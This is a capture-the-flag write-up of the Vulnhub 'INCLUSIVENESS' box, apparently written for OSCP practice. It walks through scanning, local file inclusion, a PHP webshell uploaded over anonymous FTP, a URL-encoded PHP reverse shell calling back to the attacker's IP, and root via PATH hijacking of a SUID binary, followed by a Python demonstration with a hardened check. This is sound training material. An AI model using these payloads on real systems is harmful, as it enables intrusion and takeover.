PG Play/Vulnhub | INCLUSIVENESS — WriteUp

Box 2/40

My second writeup for OSCP preparation.

RECONNAISSANCE

This phase is also called Information Gathering: the goal is to collect as much information as possible about the target before touching it directly.

I'll start off with a full TCP port scan (SYN scan, no ping, no DNS resolution, rate-limited only by --min-rate) of the target. It found three open ports: 21, 22 and 80.

nmap -p- -sS -Pn -n -T4 --min-rate=3000 192.168.128.14

Next, run a more comprehensive scan against just those ports to identify service versions (-sV), run the default NSE scripts (-sC) and guess the operating system (-O). This detail is valuable to an attacker because it points to potential attack vectors into the system.

nmap -p21,22,80 -sC -sV -O -Pn -n 192.168.128.14

ENUMERATION

It is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.

PORT 21 — FTP

A vsFTPd 3.0.3 server listens on port 21 with anonymous access enabled; there are no interesting or useful files in it. There is no known public vulnerability for this version.

PORT 22 — SSH

Valid credentials are needed to connect here, so this port is parked until some are found.

PORT 80 — HTTP

Browsing to http://192.168.128.14 shows the Apache2 Debian default page.

Check whether robots.txt is available. As shown below, a plain request is refused: the page says I am not allowed to read robots.txt.

The restriction is based on the User-Agent header, so it can be bypassed by sending the request with a search-engine crawler's User-Agent string. I used curl with a custom User-Agent and could then read robots.txt; as shown below, the disallowed entry is "/secret_information/".

Browsing to http://192.168.128.14/secret_information brings up a page describing the "DNS Zone Transfer Attack" with two hyperlinks, "English" and "Spanish". Clicking one of them shows that the page takes a lang parameter whose value (en.php) is the name of the file it loads from the file system. A parameter that names a file to include is a likely candidate for a file inclusion vulnerability.

EXPLOITATION

This is where an attacker or pentester breaks into, or otherwise gains access to, the system.

File inclusion vulnerabilities are divided into Local File Inclusion (LFI) and Remote File Inclusion (RFI). Both are common in poorly written web applications. They arise when the application builds the path passed to a function such as PHP's include() or require() from user-controlled input without validating it, so the user decides which file gets loaded and, if it contains PHP, executed.

Local File Inclusion (LFI) lets an attacker read, and sometimes execute, files already on the web server (including log files and configuration files that may hold password hashes or even clear-text passwords). The lang parameter is vulnerable because its value goes straight into the PHP include, so a relative path built from ../ sequences reaches any file the web server user can read. I try to fetch /etc/passwd this way and, as shown in the image below, the whole file comes back.

Remote File Inclusion (RFI) is easier to exploit but less common: instead of a file on the local machine, the attacker includes a file served from a remote location. In PHP this only works when allow_url_include is enabled, which it is not by default. Let's see whether the page will include a remote file by putting an external URL in the lang parameter.
I host a simple HTTP server and point the lang parameter at it; nothing happens and my server sees no request, so the page is not vulnerable to RFI.

Since I can access FTP with an anonymous login, the next question is whether the FTP tree can be reached from the web application. Let's read the vsftpd configuration file (/etc/vsftpd.conf on Debian) through the LFI.

The config file shows that the anonymous FTP root is /var/ftp and that write access for anonymous users is enabled. Because the LFI includes any file the web server user can read, a PHP file uploaded over FTP will be executed when it is included. I create a minimal PHP webshell:

<?php system($_REQUEST['cmd']) ?>

Upload the PHP file into the FTP pub directory (log in as anonymous):

ftp 192.168.128.14
cd pub
put php-cmd.php

Test whether the payload works by including it through the LFI and passing a cmd parameter. As shown below, I can execute commands on the target.

To turn command execution into an interactive session, I first start a listener on my machine (192.168.49.128). Port 80 is a sensible choice because outbound HTTP is rarely blocked.

nc -nvlp 80

URL-encode the one-liner PHP reverse shell payload so that it survives being passed in the query string. Before encoding it reads php -r '$sock=fsockopen("192.168.49.128",80);exec("/bin/sh -i <&3 >&3 2>&3");' : fsockopen opens the connection back to the listener, the socket becomes file descriptor 3 of the process, and exec starts an interactive /bin/sh with its stdin, stdout and stderr redirected to that descriptor. Encoded, it becomes:

php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Execute the PHP reverse shell payload through the webshell:

192.168.128.14/secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Once the request is sent, the listener on port 80 receives a reverse shell running as www-data, the Apache service account.

PRIVILEGE ESCALATION

It is the process of increasing the level of user privileges on a certain host to the highest permission level.

Upon checking the /home/tom directory, I found an interesting source file, rootshell.c, and its compiled binary rootshell, which has the SUID bit set.

According to the code, the program runs the whoami command and checks whether the output is "tom". If it is, the program escalates to root; otherwise it only prints the current user's name and ID. Because whoami is invoked by its bare name, the binary that actually runs is whichever one is found first in PATH.

Create a fake whoami in the /tmp directory that just prints "tom", and make it executable:

echo 'printf "tom"' > /tmp/whoami
chmod +x /tmp/whoami

Prepend /tmp to the PATH on the target so the fake whoami is found before the real one, and confirm the change:

export PATH=/tmp:$PATH
echo $PATH

Execute the rootshell

cd /home/tom
./rootshell

When the binary runs, its whoami check sees "tom", passes, and I obtain a root shell.
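The hijack works because rootshell asks an external whoami who is running it and trusts the answer. The following Python is an added example, not the box's rootshell.c (the page only describes that code, so the shape of the check is inferred from the description): it plants the fake whoami in a temporary directory instead of /tmp, shows the bare command name resolving to the planted file once that directory is prepended to PATH, and contrasts the flawed check with one that asks the kernel for the caller's uid and so cannot be influenced by PATH.

```python
"""Added example (not the box's rootshell.c, which the writeup only describes):
why a privileged program that shells out to a bare `whoami` can be fooled
through PATH, and what a PATH-independent check looks like. The fake whoami
is planted in a temporary directory rather than /tmp."""
import os
import pwd
import shutil
import stat
import subprocess
import tempfile


def plant_fake_whoami(directory, fake_user="tom"):
    """Write an executable script named whoami that prints fake_user,
    mirroring: echo 'printf "tom"' > /tmp/whoami; chmod +x /tmp/whoami"""
    fake = os.path.join(directory, "whoami")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\nprintf '%s' " + fake_user + "\n")
    os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return fake


def vulnerable_check(path):
    """The flawed pattern: run `whoami` through the shell (as system() would)
    and trust its output. Which binary runs depends entirely on PATH."""
    env = dict(os.environ, PATH=path)
    out = subprocess.run("whoami", shell=True, env=env,
                         capture_output=True, text=True)
    return out.stdout.strip() == "tom"


def hardened_check(expected_user):
    """The fix: compare the real uid reported by the kernel with the expected
    account's uid. No subprocess is involved, so PATH cannot change the answer."""
    try:
        return os.getuid() == pwd.getpwnam(expected_user).pw_uid
    except KeyError:        # account does not exist on this host
        return False


def demo():
    """Plant the fake whoami, prepend its directory to PATH (export PATH=/tmp:$PATH
    in the writeup) and report what the bare name resolves to and what each check decides."""
    clean_path = "/usr/bin:/bin"
    with tempfile.TemporaryDirectory() as tmp:
        plant_fake_whoami(tmp)
        hijacked_path = tmp + os.pathsep + clean_path
        return {
            "tmpdir": tmp,
            "resolved_to": shutil.which("whoami", path=hijacked_path),
            "vulnerable_passes": vulnerable_check(hijacked_path),
            "hardened_passes": hardened_check("tom"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run as an unprivileged user, vulnerable_passes comes back True while hardened_passes is False unless you really are tom. The same reasoning applies to any SUID program that runs a command by bare name: an absolute path (/usr/bin/whoami) or a fixed PATH set inside the program closes this particular hole, but checking getuid() avoids trusting a child process at all.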

Student